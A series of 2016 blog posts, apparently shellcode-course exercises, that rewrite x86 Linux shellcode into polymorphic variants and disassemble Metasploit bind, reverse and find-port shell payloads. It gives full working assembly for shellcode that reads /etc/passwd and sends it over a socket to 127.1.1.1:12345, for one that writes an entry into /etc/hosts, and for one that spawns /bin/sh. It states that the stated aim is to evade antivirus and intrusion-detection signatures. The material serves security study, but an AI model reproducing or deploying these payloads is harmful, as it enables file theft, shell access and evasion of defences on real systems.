AdSense

Saturday, March 12, 2016

6_3 - Polymorphism: reading "/etc/passwd" file on 127.1.1.1:12345


6_3 - READING "/ETC/PASSWD"

1 - INTRODUCTION

- Same concepts studied at  6_1 apply in this case.


2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice has the effect of reading the "/etc/passwd" file and sending the content to 127.1.1.1 port 12345

http://shell-storm.org/shellcode/files/shellcode-861.php





- Let's see 4 possible modifications:


a) Instead of using "inc", adding 1:

    ; inc ebx 
     add ebx,0x1

b) When moving between two registers, going around using a third intermediate register, what is useless and harmless but distorts the code:

    ; mov esi, eax
     mov edx, eax
     mov esi, edx

c) Using "mov" instead of "push/pop":

    ; push 0x4
    ; pop eax
     mov eax, 0x4

d) Using "mov" instead of "push":

    ;push DWORD 0x0101017f  ;127.1.1.1
    ;push WORD 0x3930  ; Port 12345
    ;push WORD bx
    
    mov dword [esp-4], 0x0101017f ; <- mov instead or push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx

    sub esp,8

- The resulting assembly program of applying these modifications is A6_3.nasm:


section .text

global _start

_start:
    ; socket
    push BYTE 0x66   
    pop eax
    xor ebx, ebx 
    ; inc ebx 
    add ebx,0x1 ; <-adding 1 to ebx
    xor edx, edx
    push edx 
    push BYTE 0x1
    push BYTE 0x2
    mov ecx, esp
    int 0x80
    ; mov esi, eax 
    mov edx, eax ; <- going around
    mov esi, edx

    ; connect
    push BYTE 0x66 
    pop eax
    ; inc ebx
    add ebx,0x1 ; <-adding 1 to ebx
    
    ;push DWORD 0x0101017f  ;127.1.1.1
    ;push WORD 0x3930  ; Port 12345
    ;push WORD bx
    
    mov dword [esp-4], 0x0101017f ; <- mov instead or push
    mov word [esp-6], 0x3930
    mov word [esp-8], bx
    sub esp,8

    mov ecx, esp
    push BYTE 16
    push ecx
    push esi
    mov ecx, esp
    ; inc ebx
    add ebx, 0x1 ; <-adding 1 to ebx
    int 0x80

    ; dup2
    mov esi, eax
    push BYTE 0x1
    pop ecx
    mov BYTE al, 0x3F
    int 0x80
    
    ;read the file
    jmp short call_shellcode
    
shellcode:
    push 0x5
    pop eax
    pop ebx
    xor ecx,ecx
    int 0x80
    mov ebx,eax
    mov al,0x3
    mov edi,esp
    mov ecx,edi
    xor edx,edx
    mov dh,0xff
    mov dl,0xff
    int 0x80
    mov edx,eax
    ; push 0x4
    ; pop eax
    mov eax, 0x4 ; <- mov instead of push/pop
    mov bl, 0x1
    int 0x80
    ; push 0x1
    ; pop eax
    mov eax, 0x1 ; <- mov instead of push/pop
    inc ebx
    int 0x80
   
call_shellcode:
    call shellcode
    message db "/etc/passwd"

3 - TESTING POLYMORPHISM

- Assembling and linking A6_3.nasm:



- Extracting the shellcode:





- Applying to ShellcodeTest.c program:






- Compiling ShellcodeTest.c:



- For testing the program, from a new console nc tool is used to listen on 127.1.1.1:12345:





- Executing ShellcodeTest.c the result is the same as the original program, the file "/etc/passwd" can be read on address 127.1.1.1 port 12345:








- While the original shellcode had 111 Bytes, the new one has got 104 Bytes. It means a reduction of 6.3%.




Friday, March 11, 2016

6_2 - Polymorphism: adding entries to "/etc/hosts" file


6_2 -  ADDING ENTRIES TO "/ETC/HOSTS" FILE

1 - INTRODUCTION

- Same concepts studied at  6_1 apply in this case.

2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice has the effect of adding a new entry in hosts file pointing 127.1.1.1 to google.com:

http://shell-storm.org/shellcode/files/shellcode-893.php

- Let's see 3 possible modifications:

a) Based in the fact that any number AND-ed by itself is the same number, the junk instruction "and edx,edx" is introduced, which effect on the functionality of the program is null:

https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29

b) Instead of pushing "/etc///hosts" characters directly onto the stack, they are moved in chunks of 4 to the stack:

    mov dword [esp-4],0x7374736f ; instead of pushing
    mov dword [esp-8],0x682f2f2f ; /etc///hosts
    mov dword [esp-12],0x6374652f ; is moved into esp
    sub esp,0xc

c) Finally, instead of using the stack to load identifiers of syscalls, "mov" instruction is used. This method is used for write(20), close(6) and exit(1):

    ;push 20         
    ;pop edx
    mov dl,0x14    ; identifier (20) for write syscall is moved to dl
    int 0x80        

   ;push 0x6
    ;pop eax
    mov al,0x6      ; identifier (6) for close syscall is moved to al
    int 0x80       

    ;push 0x1
    ;pop eax
    mov al,0x1
    int 0x80       ; identifier (1) for exit syscall is moved to al   

- The resulting assembly program of applying these modifications is A6_2.nasm:

global _start
section .text

_start:
    and edx,edx     ; junk instruction with no effect
    xor ecx, ecx
    mul ecx
    mov al, 0x5     
    push ecx

    ;push 0x7374736f     ;/etc///hosts
    ;push 0x682f2f2f
    ;push 0x6374652f
    
    mov dword [esp-4],0x7374736f ; instead of pushing
    mov dword [esp-8],0x682f2f2f ; /etc///hosts
    mov dword [esp-12],0x6374652f ; is moved into esp
    sub esp,0xc

    mov ebx, esp
    mov cx, 0x401      
    int 0x80        

    xchg eax, ebx
    push 0x4
    pop eax
    jmp short _load_data    

_write:
    pop ecx
    ;push 20         
    ;pop edx
    mov dl,0x14    ; identifier (20) for write syscall is moved to dl
    int 0x80        

    ;push 0x6
    ;pop eax
    mov al,0x6      ; identifier (6) for close syscall is moved to al
    int 0x80       

    ;push 0x1
    ;pop eax
    mov al,0x1
    int 0x80       ; identifier (1) for exit syscall is moved to al   

_load_data:
    call _write
    google db "127.1.1.1 google.com"


3 - TESTING POLYMORPHISM

- Assembling and linking A6_2.nasm:




- Extracting the shellcode:




- Applying to ShellcodeTest.c program:

 



- Compiling ShellcodeTest.c:




- Executing ShellcodeTest.c: 




- The result is the same as the original program, a new entry is created into "/etc/hosts" file, pointing 127.1.1.1 to google.com:




- While the original shellcode had 77 Bytes, the new one has got 88 Bytes. It means an increment of 14%.



Thursday, March 10, 2016

6_1 - Polymorphism: spawning "/bin/sh"



6_1 -  SPAWNING "/bin/shell" 

1 - INTRODUCTION

The goal of this exercise would be to illustrate polymorphism, one of the shellcode writing techniques commonly used to evade surveillance and detection of the Anti Virus (AV) and Intrusion Detection (ID) systems. 

The task consist on taking an original and easily detectable shellcode, and altering its internal structure so that it does not match any of the patterns that are part of the databases detection tools. 

In other words, since both AV and  ID systems work with detection patterns, altering the pattern of the shellcode keeping its funcionality or semantics validity. These techniques have the advantage of the so many abundant solutions, because every change implies a difference in the pattern of the new generated shellcode.

Specifically, there are two types of operations commonly used for creating polymorphic shellcodes:

a) replacement of certain instructions for equivalent functionality.

b) introduction of "junk" instructions whose effect on the functionality is harmless, but however contribute to distort the original shellcode.


2 - MODIFYING A SHELLCODE

- The original program to be modified in this practice has the effect of spawning a "/bin/sh" shell:

http://shell-storm.org/shellcode/files/shellcode-491.php




- Let's see three possible modifications:

a) introducing junk instructions like "std" and "cld" (setting and clearing the direction flag), what does not alter the semantics validity of the program.

b) the instruction "cltd" can be removed because it does not have any effect on the funcionality.

c) the exceve() syscall has got 11 as identifier, which must be moved at eax in some way. It can be introduced either directly (mov al,0xb) or progressively (8+2+1 = 11) with three instructions:

mov    al,0x8   ; 8 is moved to eax
add al,0x2 ; 2 is added to eax
inc eax ; eax is incremented by 1

- The resulting assembly program of applying these modifications is A6_1.nasm:

global _start
section .text
_start:

std ; junk instruction

xor    eax,eax
push   eax

push   0x68732f2f
push   0x6e69622f

mov    ebx,esp
push   eax
push   ebx
mov    esp,ecx

; cltd <- removing this useless instruction

; mov al,0xb <- 11 is moved to eax
mov    al,0x8   ; 8 is moved to eax
add al,0x2 ; 2 is added to eax
inc eax ; eax is incremented by 1

int    0x80

cld ; junk instruction


3 - TESTING POLYMORPHISM

- Assembling and linking A6_1.nasm:





- Extracting the shellcode:





- Applying to ShellcodeTest.c program:





- Compiling ShellcodeTest.c:





- Executing ShellcodeTest.c the result is the same as the original program, a "/bin/shell" is spawn:





- While the original shellcode had 23 Bytes, the new one has got 28 Bytes. It means an increment of 21%.



Tuesday, March 8, 2016

5.3 - Analyzing Shell Find Port


5.3 - SHELL FIND PORT

- shell_find_port looks for an established connection and spawn a shell over that connection.

- First, the ndisasm command disassembles the payload, outputting the corresponding assembly language instructions and its opcodes:

root@kali:~# msfvenom -p linux/x86/shell_find_port R |ndisasm -u -

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 62 bytes

00000000  31DB              xor ebx,ebx
00000002  53                push ebx
00000003  89E7              mov edi,esp
00000005  6A10              push byte +0x10
00000007  54                push esp
00000008  57                push edi
00000009  53                push ebx
0000000A  89E1              mov ecx,esp
0000000C  B307              mov bl,0x7
0000000E  FF01              inc dword [ecx]
00000010  6A66              push byte +0x66
00000012  58                pop eax
00000013  CD80              int 0x80
00000015  66817F02631A      cmp word [edi+0x2],0x1a63
0000001B  75F1              jnz 0xe
0000001D  5B                pop ebx
0000001E  6A02              push byte +0x2
00000020  59                pop ecx
00000021  B03F              mov al,0x3f
00000023  CD80              int 0x80
00000025  49                dec ecx
00000026  79F9              jns 0x21
00000028  50                push eax
00000029  682F2F7368        push dword 0x68732f2f
0000002E  682F62696E        push dword 0x6e69622f
00000033  89E3              mov ebx,esp
00000035  50                push eax
00000036  53                push ebx
00000037  89E1              mov ecx,esp
00000039  99                cdq
0000003A  B00B              mov al,0xb
0000003C  CD80              int 0x80


- Let's run the sctest command:





- The shell_find_port_dot is converted into shell_find_port.png:





- The syscall called is getpeername(): gets name of connected peer socket. 
































5.2 - Analyzing Reverse IPv6 TCP


5.2 - REVERSE IPv6 TCP


- The shellcode analyzed in this excersise is reverse_ipv6_tcp, which purpose is to spawn a command shell and connect back to the attacker over IPv6 protocol.

- First, the ndisasm command disassembles the payload outputting the corresponding assembly language instructions and its opcodes:

root@kali:~# msfvenom -p linux/x86/shell/reverse_ipv6_tcp R |ndisasm -u -

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 77 bytes

00000000  31DB              xor ebx,ebx
00000002  53                push ebx
00000003  43                inc ebx
00000004  53                push ebx
00000005  6A0A              push byte +0xa
00000007  89E1              mov ecx,esp
00000009  6A66              push byte +0x66
0000000B  58                pop eax
0000000C  CD80              int 0x80
0000000E  96                xchg eax,esi
0000000F  99                cdq
00000010  6800000000        push dword 0x0
00000015  68C0A8010C        push dword 0xc01a8c0
0000001A  6800005EFE        push dword 0xfe5e0000
0000001F  6800000000        push dword 0x0
00000024  68FE800000        push dword 0x80fe
00000029  52                push edx
0000002A  6668115C          push word 0x5c11
0000002E  66680A00          push word 0xa
00000032  89E1              mov ecx,esp
00000034  6A1C              push byte +0x1c
00000036  51                push ecx
00000037  56                push esi
00000038  89E1              mov ecx,esp
0000003A  43                inc ebx
0000003B  43                inc ebx
0000003C  6A66              push byte +0x66
0000003E  58                pop eax
0000003F  CD80              int 0x80
00000041  89F3              mov ebx,esi
00000043  B60C              mov dh,0xc
00000045  B003              mov al,0x3
00000047  CD80              int 0x80
00000049  89DF              mov edi,ebx
0000004B  FFE1              jmp ecx


- Launching the sctest command from libemu tools the emulation begins, and finally two syscalls, socket() and connect() are displayed:




- The image reverse_ipv6.dot is converted into reverse_ipv6.png:






- reverse_ipv6.png displays the phases of the shellcode, and the syscalls socket() and connect():

















































5.1 - Analyzing Bind IPv6 TCP


                                                           5.1 - BIND IPV6 TCP

- The shellcode analyzed in this excersise is bind_ipv6_tcp, which function is to spawn a command shell listening for an IPv6 connection. 

- First, the ndisasm command disassembles the payload outputting the corresponding assembly language instructions and its opcodes:

root@lic:/home/roch# msfvenom -p linux/x86/shell/bind_ipv6_tcp R | ndisasm -u -

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes

00000000  6A7D              push byte +0x7d
00000002  58                pop eax
00000003  99                cdq
00000004  B207              mov dl,0x7
00000006  B900100000        mov ecx,0x1000
0000000B  89E3              mov ebx,esp
0000000D  6681E300F0        and bx,0xf000
00000012  CD80              int 0x80
00000014  31DB              xor ebx,ebx
00000016  F7E3              mul ebx
00000018  53                push ebx
00000019  43                inc ebx
0000001A  53                push ebx
0000001B  6A0A              push byte +0xa
0000001D  89E1              mov ecx,esp
0000001F  B066              mov al,0x66
00000021  CD80              int 0x80
00000023  51                push ecx
00000024  6A04              push byte +0x4
00000026  54                push esp
00000027  6A02              push byte +0x2
00000029  6A01              push byte +0x1
0000002B  50                push eax
0000002C  97                xchg eax,edi
0000002D  89E1              mov ecx,esp
0000002F  6A0E              push byte +0xe
00000031  5B                pop ebx
00000032  6A66              push byte +0x66
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  97                xchg eax,edi
00000038  83C414            add esp,byte +0x14
0000003B  59                pop ecx
0000003C  5B                pop ebx
0000003D  5E                pop esi
0000003E  6A02              push byte +0x2
00000040  5B                pop ebx
00000041  52                push edx
00000042  52                push edx
00000043  52                push edx
00000044  52                push edx
00000045  52                push edx
00000046  52                push edx
00000047  680A00115C        push dword 0x5c11000a
0000004C  89E1              mov ecx,esp
0000004E  6A1C              push byte +0x1c
00000050  51                push ecx
00000051  50                push eax
00000052  89E1              mov ecx,esp
00000054  6A66              push byte +0x66
00000056  58                pop eax
00000057  CD80              int 0x80
00000059  D1E3              shl ebx,1
0000005B  B066              mov al,0x66
0000005D  CD80              int 0x80
0000005F  50                push eax
00000060  43                inc ebx
00000061  B066              mov al,0x66
00000063  895104            mov [ecx+0x4],edx
00000066  CD80              int 0x80
00000068  93                xchg eax,ebx
00000069  B60C              mov dh,0xc
0000006B  B003              mov al,0x3
0000006D  CD80              int 0x80
0000006F  87DF              xchg ebx,edi
00000071  5B                pop ebx
00000072  B006              mov al,0x6
00000074  CD80              int 0x80
00000076  FFE1              jmp ecx


- Using the sctest command, from libemu tools, the shellcode is emulated, and also a graphic file is created:











- The created image ot the process, bind_nonx_tcp.dot, is converted to bind_nonx_tcp.png format:







- The bind_ipv6_tcp.png image displays the four phases of the program, according to the syscalls socket, bind, listen and accept, in combination with the assembly code associated:

socke()t: creates an endpoint for communication
bind(): binds an address to a socket
listen():listens for connections on a socket
accept(): accepts a connection on a socket

- The last phase execeve() is not displayed because the shell has not been spawn in this exercise: